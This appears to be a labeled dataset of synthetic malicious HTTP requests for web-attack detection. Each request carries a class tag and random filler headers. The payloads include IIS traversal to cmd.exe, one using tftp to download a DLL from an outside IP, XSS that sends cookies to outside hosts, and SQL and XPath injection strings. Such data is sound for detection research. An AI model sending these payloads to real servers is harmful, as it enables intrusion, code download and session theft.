UA-Disp: 794,0889,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5121x090
Via: iutz/6.2 www.nnsR.css, 3.2 www.wmx1.js
Transfer-Encoding: compress
Upgrade: aite/2.5
Warning: 541 www.eam20.htm "ctRmpdnna" 
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 854949447113384923
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37357
Start - Id: 41304
class: SqlInjection
GET /h1osoa7oruink/phinhzoea1itt/bgsoundhXSIhyb1Tpssock_streamMy/oeytoebE1ttsg6be3/a1aunei/o8l/ehiZTomt6/dig6HYZGaA_cv/hEP@A.asp? HTTP/1.0
Host: 112.142.78.178
Connection: tIbecice
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: noitin9g-e0ofe, bE37hio-hetQW;q=0.3, i-n4cn;q=0.3, 46k-seNnbeed, d-xrf;q=0.5
Cache-Control: no-store
Client-ip: 163.36.54.41
Cookie: accept-I9evalEMhttps=9mP1;tusstdtuxy1e=OR    0339>998386363097;eec=Nlteo\opa
Cookie2: $Version="6"
Date: Thu, 30 Dec 04 10:08:55 CET
ETag: W/"I1QaKCxklWDlSXVw"
Expect: 100-continue
From: syaw2n@lrei.com
If-Modified-Since: Mon, 21 Apr 08 05:03:34 UTC
If-Unmodified-Since: Fri, 22 Oct 04 13:30:12 CET
If-Match: *
If-None-Match: "okUQTbEI33Ovo7nEhW"
If-Range: *
Max-Forwards: 64
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: l8me InmjnsT=nll3y
Authorization: Digest username="7umcsJ"
Range: 536989-,435785-66,662-
Referer: /ome6jd/rB5snel/aeti5/mpcnattO.txt
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.0 (compatible; cemwhgtz; Windows NT; naIr32jeae; rnnme8)
UA-CPU: 68000
UA-Disp: 094,842,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 470x0638
Via: HTTP/5.4 181.78.52.51, HTTP/2.4 www.meaterw.tiff, 6.5 www.esooet.jpeg
Transfer-Encoding: deflate
Upgrade: socrc/1.5, hIo/9.2
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 5.238.202.67
X-Serial-Number: 670048221
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41304
Start - Id: 44037
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 237.115.181.212:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 217.40.88.176
Cookie: eolysm=0i;syE45mT=92812;pv=0;hDWHbjX14scriptC=9lvaGt6M;oE=6O;ibiielReQlzpeod=547632
Cookie2: $Version="0"
Date: Wed, 17 Jan 07 14:18:14 CET
ETag: "ayOvlW22Ihp5_7In"
Expect: ehwes=nuc4cz
From: fasutm@u0PGri.cz
If-Modified-Since: Mon, 18 May 09 08:41:20 GMT
If-Unmodified-Since: Sat, 11 Apr 09 15:14:41 UTC
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 898
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: iyeh60 zesgho=4zre
Authorization: dllE 7lulj=eni7mdWi
Range: 67-764741,470518-20,3-202913
Referer: /isOnlea/gtl7sf.mp3
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: hui3w_i-68 http://www.8ese7r4.be
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: FTP/1.1 133.226.155.4, 7.6 www.ueef.css:76
Transfer-Encoding: nraOo
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44037
Start - Id: 47995
class: XSS
GET /a9ooU4Heihs1ernot.mspx?1zeanmx4yoheC=%3Cimg+++++dynsrc+++%3D+++%22++++javascript%3A+++%5Balert%28%27raaORnPf%27%29%3B%5D+%22%3E&63RtAsyeen=lhre&ptt4uat1etrroA=toacttnmkah HTTP/1.0
Host: www.eioaded.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="01"
Date: Sat, 02 Sep 06 02:53:56 CET
ETag: W/"WCb03iO-YhbC5XqA"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Wed, 25 Feb 09 07:01:43 UTC
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: "Ls_CRKSN.YPAAr9X8vt"
If-Range: Sun, 14 Oct 07 02:29:04 GMT
Max-Forwards: 3
MIME-Version: 9.7
Pragma: ee2i=sh
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic SWVuN2RuOjNoeWFtZXNl
Range: 209-45720
Referer: /rtn4rde/abnpqRea.asmx
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: mlfrstlxtidmrezab
UA-CPU: 68000
UA-Disp: 491,839,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 480x167
Via: 0.1 www.etsedn.tiff
Transfer-Encoding: deflate
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 44433169110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47995
Start - Id: 45669
class: PathTransversal
GET /qmecopy9WDOGd/D3HShwf/u.5SLnERyY4pR/iprocessing-instruction_Jyz4k/uz7D3PB/c7Vv4.png?zcyweealyu3w2A=e%3A%5Cautoexec.bat&reo7nasji=553588&MUSiframe3=tevstnsbl&aposEhdnt=45&itudIwzLxmn9tet=908&royoevaq9reieo=1429006&i2sgVe2genios=812506&rtdSeo=6emnaj4swktcuteol&geGeio3=oe&nsoesinupou=%3D%7Cieval&haye=tJzi5 HTTP/1.0
Host: 176.14.85.77
Connection: pt5eyr
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity, identity;q=0.2, deflate
Accept-Language: *;q=0.4
Cache-Control: min-fresh=124
Client-ip: 10.24.0.201
Cookie: hbg1=irc;niqgttdoi7lw=)F
Cookie2: $Version="823"
Date: Tue, 06 Oct 09 15:46:49 UTC
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 01 Oct 08 01:21:02 UTC
If-Unmodified-Since: Wed, 12 Jan 05 14:09:31 GMT
If-Match: *
If-None-Match: "bDGk7z1JyoB-94-G"
If-Range: "bGleP.UdyMUqXecdXiZ"
Max-Forwards: 3
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Digest nc=84437ae2
Range: -62,101-,55-837
Referer: http://www.bnat1ap.biz/nbot0fui.png
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: stcs2kdhnthsLtcmh
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: deflate
Upgrade: au3/0.3, DRlrd/5.7
Warning: 203 www.aloLt.js "tecu06" "Sun, 07 Mar 04 20:34:54 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45669
Start - Id: 46630
class: XSS
GET /8DbeU6/vy@JoWcZdK95sVlW-1/-HBdcatq/eiichl9slNdhpi/tTF3tdsDvFQkhs3K43M.htm? HTTP/1.0
Host: 158.224.212.161:48
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: z-tran;q=0.3, r-doK
Cache-Control: no-transform
Client-ip: 129.154.166.65
Cookie: 3wjhttpS@67=65
Cookie2: $Version="5"
Date: Thu, 01 Sep 05 05:39:20 CET
ETag: W/"zoenLZIy2Xkfo@ynfz"
Expect: vetise=ab4eliOb
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Wed, 15 Nov 06 22:43:45 UTC
If-None-Match: "2rdOem7lL7YEEZ8"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: uwsnu itseo=idiuplw
Range: 516737-,3-
Referer: http://www.usidh.org/c7sils/ctr1e/nat3t/n2ntan.aspx
TE: trailers,trailers
User-Agent: <img dynsrc=  " javascript:    [window.open('http://233.110.29.181/ll.msf'+document.cookie);]  " >
UA-Pixels: 7335x113
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: identity
Upgrade: Ecza/9.5
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46630
Start - Id: 44405
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: 140.123.119.35:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 136.18.89.145
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="3"
Date: Sun, 08 Jun 08 18:24:43 CET
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: entlr@ASnuouyuhe.cz
If-Modified-Since: Tue, 20 Jan 04 21:03:03 CET
If-Unmodified-Since: Mon, 28 Sep 09 22:27:24 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Thu, 14 Oct 04 08:41:48 CET
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: Aeo2b tttu1f=oatrt
Authorization: oigi5 uil1eat=nanstcl
Range: 07334-,0929-,-17620
Referer: /tjsa/ieuhsr/eaazeaeu/esioa/styoafeo.tiff
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: etdfnmrntf (epd8mwl; r8MjW.; ixz5Er)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16212196997401300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44405
Start - Id: 44472
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 154.123.116.20:80
Connection: keep-alive
Accept: video/mpeg, video/quicktime;q=0.7, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress, gzip, deflate
Accept-Language: o-shzhx;q=0.0, negatt-qeIrd;q=0.5
Cache-Control: no-cache
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="38"
Date: Sun, 29 May 05 07:33:14 UTC
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: gnetsmnu=tlaou;tnr3Ia5i=Cmw8
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Fri, 25 Jul 08 13:35:25 GMT
If-Match: "nTPMIixCYYawxKeXCE"
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: *
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 7pYecmhh='arng'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest opaque="rResoet"
Range: 6-02287,72753-
Referer: http://hJeRru.gov/o6tw/HoNhO9/croeIw/eze8l/iin7la.png
TE: deflate;q=0.2,deflate;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/8.4 (X11; U; Unix 7.9; ei-n9; rv:4.0.7) Gecko/98535851
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4559x569
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44472
Start - Id: 46064
class: PathTransversal
GET /f1oEf9P5PgVo/sXWUY3o4ljLus/fN/7em@s6wtb7/w4ZtBt/eRzCc_@MLKBC2I/toax2kOrsb5W2aWa/FyGni6ueonRyIa5ms/1DCm/gbitwniotngeoseplne/hMwoogrTaodlts.php4? HTTP/1.1
Host: www.wSrhan.ch
Connection: keep-alive
Accept: video/*, application/*;q=0.2
Accept-Charset: iso-8859-15;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=08766
Client-ip: 117.205.42.218
Cookie: zeqalceyculsodc=sKM6FvdQz1qK;Oyuisskieo9woY=e1ObMAON.Yh;eklUvzCqFGb=pabrnir;sHee45aal=/,,,/ee0s4/sSnoo/passwd
Cookie2: $Version="4"
Date: Sun, 30 Mar 08 08:35:16 CET
ETag: "89n_EoPk8P@WItdC_mIe"
Expect: zuqapeo
If-Modified-Since: Fri, 08 Apr 05 10:58:38 UTC
If-Unmodified-Since: Wed, 28 May 08 16:29:05 CET
If-Match: *
If-None-Match: "A2j2QNOS.aj2hCSkhq3q"
If-Range: Wed, 21 Sep 05 14:46:05 CET
Max-Forwards: 770
MIME-Version: 8.9
Pragma: ici='e'
Proxy-Authorization: Basic aGloaTppbmVoY3Q=
Authorization: Basic ZGVoYWg6bnl3ZHZySTM=
Range: 3-9692
Referer: http://www.tfkrntr.de/oaaH/w8hu/rvxavs1/rJt4.pl
TE: gzip;q=0.8
User-Agent: n8tn (nEfqQwzph; tAUK6A; uEuk-8k; eF__hL5CS-)
UA-CPU: PowerPC
UA-Disp: 5418,5320,32
UA-Pixels: 5971x133
Via: HTTP/0.8 www.y1Ydt3d.css, latses/5.6 www.esdepmox.css, 4.6 www.Solhxi4w.html:05
Transfer-Encoding: gzip
Upgrade: hhi1/2.3, iZeo/5.3, nacne/9.4
Warning: 493 www.te09o.jpg "noiocpaoalanbisi" "Wed, 24 Sep 08 15:20:04 GMT"
X-Forwarded-For: 228.116.181.1
X-Serial-Number: 2545410

null

End - Id: 46064
Start - Id: 50012
class: XPathInjection
PUT /Anjs5csar/Tjhi8xeaSaeaell/r5b/emlancyehedsaEa.pl? HTTP/1.1
Content-Length: 225
Content-Language: dhavg1,atceno,aelo
Content-Encoding: gzip
Content-Location: /ruo7v/lejwf/ur0nnmrh/oEiib.tar
Content-MD5: aTluYWFvdXRvZXF0bWF0Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jul 09 20:22:30 GMT
Last-Modified: Sun, 20 Apr 08 05:35:32 UTC
Host: 96.139.172.100
Connection: close
Accept: image/*, video/mpeg, audio/*
Accept-Charset: iso-10646-ucs-2;q=0.5, iso-2022-kr
Accept-Encoding: *;q=0.9
Accept-Language: mw-Sa4ht;q=0.7, oaeseccl-db;q=0.2, w-e;q=0.0, atwsba-hhen, znho-laeedcet
Cache-Control: N=i
Client-ip: 119.180.39.9
Cookie: sle=746;etcljaanE9n=lgi4uppr3s
Cookie2: $Version="209"
Date: Wed, 26 Sep 07 16:01:37 GMT
ETag: "dN57PUE.0bX7IaJDWN-"
Expect: 100-continue
From: Ecil@targ.fr
If-Modified-Since: Thu, 14 Dec 06 23:54:27 GMT
If-Unmodified-Since: Tue, 27 Jul 04 23:40:35 CET
If-Match: *
If-None-Match: "Ld45eQewneC92MZ"
If-Range: Sat, 16 Jul 05 10:38:55 GMT
Max-Forwards: 74
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nc=95A56604
Authorization: gm4m d2tqs=mam0s
Range: 1-0902
Referer: /udEuuss/eHoeOzr/otitrth/hyoqS/otprqjea.msf
TE: trailers,trailers
Trailer: If-Match
User-Agent: 156 or     1<     mcswk/wt/l/child::text()[position()=816]  or    66901='] | /* | /foo[bar='
UA-CPU: MIPS
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 408x327
Via: 6.9 192.205.223.149:6, FTP/3.3 105.239.103.166:42, 0i5D/1.9 145.181.113.198
Transfer-Encoding: compress
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

mE=g&tce2mig=areeh&ohjnsRe2hst=ie4idslrn&shhntrs3b=t6ekSINwg3jN&rUeuttXeecleo=rlmekobjectsamjqbyan&potm=019&Es=917010&psqW@rpassthru38B=morlM4hN&rfu=27&elq=t2oh&aSjFrLec6i=nFmWARU5t.Is&iexntu0eahmh=2761501&etisTehfi0kdyl=-C-w

End - Id: 50012
Start - Id: 47020
class: XSS
GET /a4STNvyFJYJLY/zf/inj6oee/ahbrstaaqii0newanT.tiff?ngrTdlTesbr=kpsno&ukeqouhs=w+&14a=Rnetcatiki%7Eidl8+&_S1J2.=mehpeeomabras4a&5mq=aqddsuleIuchaelpi&zanli6r=%3Cstyle+%3E%3C%21--%3C%2Fstyle%3E%3Cscript++++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.an.com%2Fcgi-bin%2Fselialitor.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E HTTP/1.1
Host: 43.138.161.192
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.1, compress
Accept-Language: *;q=0.1
Cache-Control: max-age=55726
Client-ip: 113.178.205.82
Cookie: sk=or-G
Cookie2: $Version="12"
Date: Mon, 30 Jul 07 09:54:38 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: *
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: *
Max-Forwards: 5047
MIME-Version: 4.5
Pragma: 3vf4aesf='n'
Proxy-Authorization: guaey ansi2ou=Anhkil5
Authorization: Basic bHRtYWk6ckIzZw==
Range: 5-22964
Referer: /holeyxcB/namiE/oyra/rWlncm9.bin
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 6.3; sh-vw; rv:5.3.2) Gecko/81193453
UA-CPU: Sparc
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: s3t/8.4 172.50.191.192
Transfer-Encoding: identity
Upgrade: hy8Iti/1.1, b7ne/7.6
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47020
Start - Id: 41579
class: SqlInjection
GET /3Nirmetan/icefreE/q3r/hdpo/ie/lyhs.png?xSsqeoRa7oeen=Risei&A8sonrds=rdnoe&eSehrriNyfs=711088&knfsvl=7%3Fl&s8a9gi1rhb=tuh3jR%40&qBztmpttnopassthrue=ititExta&ix=peh%7Cgln1i&E4BXG-=Exc5Ul%40edo&tlctE=3hssklsPe%5C8fromhomeoiita&CpdFM8=hQgpbw&Ra0nrudetots=6753797&eGzByV=876&tte=%27++++%2F**%2F++OR+++++%2F**%2F%27%27+++%3D++%27 HTTP/1.0
Host: www.n4eCrdf.it
Connection: close
Accept: video/*;q=0.8, text/plain, image/*;q=0.2
Accept-Charset: iso-8859-6;q=0.2, euc-tw;q=0.7
Accept-Encoding: deflate, compress, gzip, identity, gzip;q=0.6
Accept-Language: 7te-en36d, aueepHa-cthie6a;q=0.2, tneabcon-lt88cms, hwoo-oEd
Cache-Control: no-transform
Client-ip: 237.68.176.239
Cookie: sessiriri=unionscriptA2nivbscriptbetween1eefebarsfo;exiahceTHt5=%d~;hzie1uE9s4=62;atMsitsxee=dg3tnullicala;qrnsernua8th= ss;7h=@
Cookie2: $Version="8"
Date: Sat, 29 Jan 05 22:04:36 UTC
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Fri, 07 Mar 08 22:23:14 GMT
If-Unmodified-Since: Thu, 17 Aug 06 15:33:44 GMT
If-Match: "6JSVC8JVtlS90@dW"
If-None-Match: *
If-Range: Wed, 30 Nov 05 03:35:24 GMT
Max-Forwards: 98
MIME-Version: 3.1
Pragma: emy=Wsbebha
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM aWVpZHVpcHdzYmFydHdvMGlpaXN2azZsc25lVFJ1ZzZvYmI1ZnVh
Range: 629953-,-3
Referer: /eiuta/e3uhre/tGukTt/s7nrEew/e8rt.tiff
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Ao3r/7.2.6.6.6
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 8.4 www.ysnoeab.css, 2.5 61.214.88.240, 6.6 www.s9gbsu.gif
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41579
Start - Id: 44337
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 251.119.56.129
Connection: keep-alive
Accept: application/zip;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: Plnab-xtnlhy2;q=0.3
Cache-Control: max-stale=95063
Client-ip: 216.220.28.19
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Fri, 16 May 08 13:35:58 GMT
ETag: "pOapT_4.CIXI5gO"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Tue, 17 Jan 06 01:32:43 GMT
If-Unmodified-Since: Thu, 15 Feb 07 09:07:32 CET
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 76
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM Y2lJbGVhYW5vbnlzbm5oZ255M0k2ZzF0aDcyMmJ3dDE2Y210dA==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://miteeue.it/fieatd.sh
TE: trailers
Trailer: If-None-Match
User-Agent: mEYPx@i.Uc http://www.OeiiEm.biz
UA-CPU: x86
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: uet/6.7 www.cwocaih.htm
Transfer-Encoding: compress
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44337
Start - Id: 48128
class: XSS
GET /h2QL0-qtOAfV4..gif?PHpj@xDstdinJ=%3Cdiv++style++%3D+++%22++++background-image%3A++url%28javascript%3A++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.mamans.com%2Fcgi-bin%2Fdeliin.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++%22+++%3E&eypOEdvdhevdwse=pwas%3DFa HTTP/1.0
Host: www.0ethd.cz
Connection: 1eseep
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 94.244.224.171
Cookie: Lstdin1S7RPkC=tli4es
Cookie2: $Version="2"
Date: Fri, 14 May 04 15:49:49 UTC
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: 6uo4gu5
From: odallu0e@nalp.cz
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Fri, 28 Jul 06 24:37:01 CET
If-Match: *
If-None-Match: "nTn6bOTuqM51mxZl"
If-Range: Sat, 24 Nov 07 07:18:40 CET
Max-Forwards: 28
MIME-Version: 3.4
Pragma: eds=euro
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 2-92,159872-,109519-
Referer: /ncp3xg/hw2ywolr/bs7rn.aspx
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: 79e0ll (dAg4zY7jw; s33EdCtcc; jWBnrq; 2qCcKf.0; i0kGF1n)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2048x2568
Via: FTP/4.2 www.slvia5m.js:255, HTTP/7.3 www.EnUsetna.jpg, HTTP/0.9 www.oyen.html
Transfer-Encoding: aWp4; ttoef=lbly
Upgrade: 1ld/1.5, ec6b/0.1, A7r/0.6, peeQ/2.5
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48128
Start - Id: 36602
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 78.183.143.65
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity;q=0.4, deflate
Accept-Language: a-tistesEd, tX8ts0w-ynt;q=0.2, inaoenlB-ootAOa;q=0.6, 1ictcnu-nuesh;q=0.6
Cache-Control: no-store
Client-ip: 91.176.186.251
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="8"
Date: Tue, 08 Dec 09 08:42:34 UTC
ETag: W/"pQOXcIItfLgaCXJGA"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Tue, 24 Mar 09 15:08:29 CET
If-Unmodified-Since: Wed, 05 Aug 09 15:14:53 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 46
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic aG1pbDk4YzptZTNlcA==
Range: 952-526,59910-,78804-
Referer: /eshcIss/0csiidwo/nTOeieaL/8owassc.tiff
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (compatible; Konqueror/1.9; Win 9x; ogtoo; tr5jr4cew)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: FTP/6.3 72.148.245.251
Transfer-Encoding: g3ee; tyle=eaibdh
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 079 www.hmte9ks.gif "bsnlaehuereei" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36602
Start - Id: 36592
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.reooui.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, compress;q=0.8, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 88.241.103.90
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Sat, 08 Jul 06 13:52:37 CET
